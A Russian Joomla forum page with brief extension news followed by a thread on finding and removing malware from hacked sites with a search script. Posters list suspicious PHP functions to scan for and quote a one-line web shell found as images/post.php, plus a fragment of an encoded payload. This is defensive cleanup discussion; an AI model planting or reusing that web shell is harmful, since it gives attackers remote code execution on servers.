Новости Joomla

Joomla REST API без прав суперадминистратора. RBAC в Joomla

Joomla REST API без прав суперадминистратора. RBAC в Joomla

👩‍💻 Joomla REST API без прав суперадминистратора. RBAC в Joomla.На канале известного французского разработчика и специалиста по Joomla REST API Alexandre ELISÉ вышло новое видео.RBAC (Role-Based Access Control) - это управление доступом на основе ролей, метод управления доступом к ресурсам, основанный на назначении ролей пользователям. Вместо назначения прав каждому пользователю точечно права доступа группируются по ролям, а пользователи получают доступ к ресурсам уже в зависимости от своей роли. В контексте Joomla и REST API он может даже мешать работе: без авторизованного пользователя вы не можете даже показать контент. В видео показано как решить данную проблему. Создаётся "технический пользователь", которому разрешается просматривать контент, но не разрешено создавать, редактировать, удалять и т.д. И все запросы к REST API идут с использованием его токена. [fr-FR] Services Web API Joomla SANS être Super Admin RBAC natif avec Joomla@joomlafeed #joomla #разработка #rest

InterLinked - плагин автоматической внутренней перелинковки для Joomla

InterLinked - плагин автоматической внутренней перелинковки для Joomla

👩‍💻 InterLinked - плагин автоматической внутренней перелинковки для Joomla.Несвязанные статьи - это молчаливый убийца привлекательности вашего сайта на Joomla, который заставляет читателей сворачивать работу и подрывает эффективность вашего SEO. Content - InterLinked - это бесплатный, проверенный в боях плагин, который кладет конец этой бессмыслице, автоматически генерируя ссылки на основе ключевых слов между статьями на вашем сайте Joomla 5. Он создает сеть связей, используя ключевые слова статей (metakey) и ассоциации категорий, с настраиваемыми всплывающими подсказками, целевыми объектами ссылок и классами CSS, сохраняя при этом существующие ссылки и повышая производительность за счет кэширования. Кроме того, ссылки со временем меняются по мере того, как в новых статьях используются ключевые слова, что делает ваш контент свежим и актуальным.Возможности.- автоматическая перелинковка на основе значения meta-keywords материалов- встроенная поддержка материалов Joomla- пользовательские ассоциации категорий для создания ссылок (например "Блог" к "Учбеникам")- показ всплывающих подсказок к автоматическим ссылкам (опционально)- настраиваемый атрибут target для ссылок.- указание CSS класса для стилизации ссылок- кэширование совпадений ключевых слов и их ассоциаций- учёт существующих тегов <a> во избежание дублирующих ссылок- автоматическое добавление новых ссылок при появлении новых ассоциаций- веб-доступность: ARIA для ссылок с target="_blank".Плагин бесплатный. Заявлена поддержка Joomla 4 и Joomla 5.Joomla Extensions DirectoryСтраница расширенияСкачать@joomlafeed#joomla #расширения #seo

joomLab Gallery - плагин галереи изображений для Joomla

👩‍💻 joomLab Gallery - плагин галереи изображений для Joomla.Плагин joomLab Gallery позволит Вам добавлять в любой материал неограниченное количество галерей, а главное удобно управлять файлами и эффектами в каждой галерее.Плагин использует популярны скрипты Swiper.js и FancyBox. Первый для крутой организации и эффектов галерей, а второй для красивого и функционального показа оригинальных изображений на Вашем сайте.На данный момент плагин имеет 10 макетов вывода - это 10 различных эффектов галерей и Вы можете совмещать все 10 в 1 материале.Плагин позволяет гибко настраивать индивидуально каждую галерею в материале. Вы можете выбрать макет, эффекты и даже можете управлять функциями всплывающего окна изображения.Недостатки.Такой вид реализации не предусматривает выбор изображения на сервере. Т.е. Вы не можете выбрать уже добавленное фото, только загружать заново. Плагин не предоставляет возможности доступа к медиа-менеджеру.Плагин бесплатный. Разработчик - участник нашего сообщества Александр Новиков (@pro-portal).Страница расширения@joomlafeed#joomla #расширения

0 Пользователей и 1 Гость просматривают эту тему.
  • 72 Ответов
  • 38881 Просмотров
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Но вы там не все указали )))
Цитировать
Код может быть обфусцирован, но разные eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13 с абракадаброй тоже весьма привлекают внимание, как и вариации на тему file, fopen, readfile, file_get_contents, HttpRequest::send с чужими адресами.
источник
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Скажите пожалуйста, а поиск по регулярным выражениям в Вашем скрипте есть? Если есть, то какие переменные для задания регулярных выражений?
Пока нет, но я думал про это, так как нужно искать еще строки больше определенной длины (обфусцированный код или закодированный через base64_encode обычно имеет большую длину и без пробелов), вообще скрипт пригодится и для обычной работы с сайтом, часто возникает потребность найти в коде что-то, а без скачивания сайта или отдельных папок себе на компьютер не обойтись, есть наверное фтп клиенты с поиском по содержимому файов, но они будут работать намного медленнее чем скрипт, так как скрипт использует ресурсы сервера, а  фтп клиент домашнего компьютера на котором установлен. Если кому нужно можно переделать в компонент для Joomla.

icom, спасибо за скрипт! Если Вы не против оставлю заметку у себя на сайте

Пожалуйста, я не против
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Но вы там не все указали )))источник

вы правы, нужно расширить список подозрительных функций
*

altyn

  • Захожу иногда
  • 310
  • 7 / 0
  • Бог придумал смех для того чтоб над собой смеялись
Файл например может найти "eval(base64_decode("
а вот более eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlc уже не ищет, и еще добавляет слеш
а если нечего заменить просто удалить,  пробел ставить нельзя?
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Цитировать
Файл например может найти "eval(base64_decode("
а вот более eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlc уже не ищет, и еще добавляет слеш
исправил

Цитировать
а если нечего заменить просто удалить,  пробел ставить нельзя?
можно, а можно и ничего не ставить, просто галку "Заменить" поставить
*

altyn

  • Захожу иногда
  • 310
  • 7 / 0
  • Бог придумал смех для того чтоб над собой смеялись
Респект и +10 icom
Вот нашел такой линк 
Цитировать
$link  = base64_decode( JRequest::getVar( 'link', '', 'post', 'base64' ) );
Это может быть вредоносным кодом ?
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Код
Это может быть вредоносным кодом ?
не думаю, base64_decode сама по себе не опасна, а вот с функцией eval() да
*

MaxFarSeer

  • Захожу иногда
  • 384
  • 29 / 0
  • http://ru.ah.fm:80
Добрый вечер, спасибо за скрипт. Вопрос такой:
с помощью вашего скрипта подчистил код, поменял пароли на фтп. Искал только по строке, которая везде добавлялась:
Спойлер
[свернуть]

какие действия еще нужно провести? в теме идет речь о поиске шела и прочее, мне это не очень понятно. Иными словами, что еще нужно поискать/как поискать/логи какие то почитать? чтобы не было повторного заражения ?
Не можете найти, где редактировать код? Читаем:
Быстрый и легкий поиск нужных файлов для редактирования чего-либо

Я много времени потратил на изменение готовых шаблонов, раскуривание чего и как там у буржуев, менял код вложенный в 100500 дивов, да они неплохи эти T3 и Warp (YOO), но стоит начать делать свой шаблон...Ребята!!! Всем советую! Свое - так легко настраивать!
*

!eX

  • Новичок
  • 7
  • 0 / 0
Использую утилиту: replace.zip
В поле: Текст поиска*: пишу полностью вредоносный код с ковычками.
Вопрос: Что указывать в поле -  "Текст замены:"
*

Aleks_El_Dia

  • Живу я здесь
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
Использую утилиту: replace.zip
В поле: Текст поиска*: пишу полностью вредоносный код с ковычками.
Вопрос: Что указывать в поле -  "Текст замены:"
А ссылочку?
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
*

!eX

  • Новичок
  • 7
  • 0 / 0
Имеется ввиду, использую утилиту  http://cmsdev.org/files/replace.zip о ней сообщалось в этой ветке. Предназначена для массового удаления вредоносного кода base64_decode. Не совсем понял, что писать в поле  "Текст замены:"
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
вредоносного кода base64_decode. Не совсем понял, что писать в поле  "Текст замены:"

 base64 как и md5 просто метод кодировки decode указывает что надо раскодировать (курим мануалы)
а сам вредоносный код идет дальше DQplcnJvcl9yZXB...........

Вот чистая Joomla 1.5.25 с оф сайта
Спойлер
[свернуть]
« Последнее редактирование: 30.01.2012, 15:40:03 от oriol »
*

zicale

  • Новичок
  • 3
  • 1 / 0
Ребята, спасибо огромное.
Replace - вещь!
Fls из темы http://joomlaforum.ru/index.php/topic,198048.msg1042877.html#msg1042877 класс!
Нужно их оба использовать, с помощью первой вычистил сайт от eval base с помощью второй нашел уязвимость в компоненте "Simple Spotlight" http://extensions.joomla.org/extensions/photos-a-images/images-rotators/11876 причем такая дыра - рай для хакера, шелл залить на раз - оставили форму загрузки картинок, причем скачал с оф.сайта дистрибутив, видимо не увидели просто.
*

fedor32

  • Новичок
  • 1
  • 0 / 0
проверьте папку images, там может быть файл post.php со следующим содержанием

<?php eval(base64_decode($_POST["php"])); ?>

Стирайте нахрен, из него и растут роги. У меня он был только в одном сайте, но были поражены все, которые лежали рядом
*

angemax

  • Захожу иногда
  • 140
  • 3 / 0
А мои сайты заразили, создав отдельные папки. На одном в корне была создана папка lib, в неё залит index.php с кодом:

Спойлер
[свернуть]

В этой же папке лежал .htaccess с записью:
Спойлер
[свернуть]

В результате работы в индексе поисковиков появились страницы с ключевыми запросами на варезники. И "наштамповано" было более 1000.

Есть ли вероятность того, что простое удаление этой папки, не решает проблему?
index.php в корне проверила, ничего подозрительного не увидела
*

maratishe

  • Осваиваюсь на форуме
  • 25
  • 0 / 1
Ребята. Я так и не понял...  Что штавить в "Текст замены"
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Ребята. Я так и не понял...  Что штавить в "Текст замены"
если стоит галка "Замена", то в файлах сайта "Текст поиска" будет заменен на "Текст замены", если в "Текст замены" ничего нет, то "Текст поиска" будет удален из файлов )
*

maratishe

  • Осваиваюсь на форуме
  • 25
  • 0 / 1
Ага сделал))  И сайд пос этого не работает ....
*

icom

  • Давно я тут
  • 830
  • 202 / 4
а что вы конкретно сделали? верните из бекапа
лучше скриптом не пользуйтесь, если не знаете для чего он
*

maratishe

  • Осваиваюсь на форуме
  • 25
  • 0 / 1
Ну вставлял: eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13.........

Нашёл много..

Потом поставил галкаку  "Замена"

в "Текст замены" ничаво не писал.

И все

Потом саид не работал  ERROR line 188
*

icom

  • Давно я тут
  • 830
  • 202 / 4
eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13 это все функции php, которые используются как в самой Joomla так и в сторонних компонентах, если вы их нашли, то это не повод их удалять), лучше обратитесь к специалистам в этом вопросе, а сайт восстановите из бекапа, если его нет, то обратитесь к хостеру чтоб восстановил
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
хочу выяснить как происходит заражение (слежу 3 дня), у него 24 сайта на одном аккаунте, заражаются регулярно только три, через что мне казалось что взламывают не через фтп
Появилась идея, как взламывали? А то приехала точно такая же радость. Файлы меняли в два захода, логов за эти дни уже нет.
*

romashko1901

  • Новичок
  • 1
  • 0 / 0
чуть выше есть ответ: в папке images файл post.php спасибо :D автору за подсказку
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
чуть выше есть ответ: в папке images файл post.php
Это не ответ. Ответ звучит так: файл post.php попал на сервер в результате ...
Вот многоточие как раз и интересует. Сервер я вычистил, с июля тихо. Но как это Г. мне закинули - остаётся большим вопросом.
« Последнее редактирование: 12.10.2012, 05:16:28 от WebDisaster »
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Было бы что читать - давно бы вычитал. Я уже объяснил:
Файлы меняли в два захода, логов за эти дни уже нет.
Шелл закинули и он около двух месяцев (если судить по дате создания файла) тихо лежал. Когда им начали пользоваться, логов на дату создания файла уже не было.
*

Rmilovidov

  • Захожу иногда
  • 110
  • 1 / 0
  • Работаю на себя
Кто за определенную плату может полечтить сайт от вируса-редиректа?
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

[Решено] Заразились в один день 4 аккаунта по 10 сайтов

Автор Stich SPb

Ответов: 356
Просмотров: 78106
Последний ответ 13.09.2019, 18:49:33
от diana1975
На мобильном не работает сайт (решено, ошибка в андройде)

Автор dragon4x4

Ответов: 5
Просмотров: 2101
Последний ответ 01.03.2018, 22:46:10
от dragon4x4
[Решено] Странный файл в Akeeba Backup - вирус?

Автор jimka

Ответов: 2
Просмотров: 1470
Последний ответ 31.05.2016, 17:39:15
от flyingspook
На сайте появилось перенаправление на нехороший сайт

Автор batot

Ответов: 5
Просмотров: 1282
Последний ответ 26.11.2015, 19:34:21
от jlend
Проверка всех файлов на изменения

Автор kik84

Ответов: 8
Просмотров: 2943
Последний ответ 17.03.2015, 13:25:47
от kik84